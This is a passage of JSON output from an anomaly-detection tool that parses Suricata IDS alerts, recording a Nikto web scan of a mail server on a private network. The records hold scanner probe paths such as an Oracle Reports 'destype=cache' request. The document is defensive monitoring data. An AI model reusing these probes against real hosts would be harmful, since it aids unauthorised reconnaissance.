non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: ", "/parser/model/classification": "Generic Protocol Command Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46772, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.156769 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46772 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.16 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/bISn4adA.TXT", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": "{\"timestamp\":\"2020-03-04T19:18:34.156961+0000\",\"flow_id\":1001345839161358,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46772,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.TXT\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.TXT\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", "/parser/model/time": 1583349514.156961, "/parser/model/plus_sign": "+", "/parser/model/tz": 0, "/parser/model/comma_str": "\",", "/parser/model/flow_id": "\"flow_id\":1001345839161358,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": "fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46772,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.TXT\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.TXT\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": "fileinfo\",", "/parser/model/event_type/fileinfo/conn": "\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46772,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.TXT\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": "\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.TXT\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA.TXT\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", "/parser/model/event_type/fileinfo/fileinfo/state": "CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": "\",\"stored\":", "/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA.TXT\",", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA.TXT", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", "/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA.TXT", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, "/parser/model/event_type/fileinfo/http/length_str": ",\"length\":", "/parser/model/event_type/fileinfo/http/length": 226, "/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": "192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46772,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46772, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": "TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":1001345839161358,", "/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", "/parser/model/flow_id/flow_id/flow_id": 1001345839161358, "/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ "{\"timestamp\":\"2020-03-04T19:18:34.156961+0000\",\"flow_id\":1001345839161358,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46772,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.TXT\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.TXT\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": [ 1583349514.16 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.159041 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46774 -> 192.168.10.154:80", "/parser/model/time": 1583349514.159041, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: ", "/parser/model/classification": "Generic Protocol Command Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46774, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.159041 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46774 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.16 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/bISn4adA._", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": "{\"timestamp\":\"2020-03-04T19:18:34.159362+0000\",\"flow_id\":2036518856845440,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46774,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA._\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA._\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", "/parser/model/time": 1583349514.159362, "/parser/model/plus_sign": "+", "/parser/model/tz": 0, "/parser/model/comma_str": "\",", "/parser/model/flow_id": "\"flow_id\":2036518856845440,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": "fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46774,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA._\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA._\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": "fileinfo\",", "/parser/model/event_type/fileinfo/conn": "\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46774,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA._\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": "\",\"fileinfo\":{\"filename\":\"\\/bISn4adA._\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA._\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", "/parser/model/event_type/fileinfo/fileinfo/state": "CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": "\",\"stored\":", "/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA._\",", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA._", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", "/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA._", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, "/parser/model/event_type/fileinfo/http/length_str": ",\"length\":", "/parser/model/event_type/fileinfo/http/length": 226, "/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": "192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46774,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46774, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": "TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":2036518856845440,", "/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", "/parser/model/flow_id/flow_id/flow_id": 2036518856845440, "/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ "{\"timestamp\":\"2020-03-04T19:18:34.159362+0000\",\"flow_id\":2036518856845440,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46774,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA._\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA._\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": [ 1583349514.16 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.162334 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46776 -> 192.168.10.154:80", "/parser/model/time": 1583349514.162334, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: ", "/parser/model/classification": "Generic Protocol Command Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46776, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.162334 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46776 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.16 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/bISn4adA.rdf+destype=cache+desformat=PDF", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": "{\"timestamp\":\"2020-03-04T19:18:34.162552+0000\",\"flow_id\":1625615040672730,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46776,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.rdf+destype=cache+desformat=PDF\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.rdf+destype=cache+desformat=PDF\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", "/parser/model/time": 1583349514.162552, "/parser/model/plus_sign": "+", "/parser/model/tz": 0, "/parser/model/comma_str": "\",", "/parser/model/flow_id": "\"flow_id\":1625615040672730,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": "fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46776,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.rdf+destype=cache+desformat=PDF\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.rdf+destype=cache+desformat=PDF\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": "fileinfo\",", "/parser/model/event_type/fileinfo/conn": "\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46776,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.rdf+destype=cache+desformat=PDF\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": "\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.rdf+destype=cache+desformat=PDF\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA.rdf+destype=cache+desformat=PDF\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", "/parser/model/event_type/fileinfo/fileinfo/state": "CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": "\",\"stored\":", "/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA.rdf+destype=cache+desformat=PDF\",", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA.rdf+destype=cache+desformat=PDF", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", "/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA.rdf+destype=cache+desformat=PDF", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, "/parser/model/event_type/fileinfo/http/length_str": ",\"length\":", "/parser/model/event_type/fileinfo/http/length": 226, "/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": "192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46776,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46776, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": "TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":1625615040672730,", "/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", "/parser/model/flow_id/flow_id/flow_id": 1625615040672730, "/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ 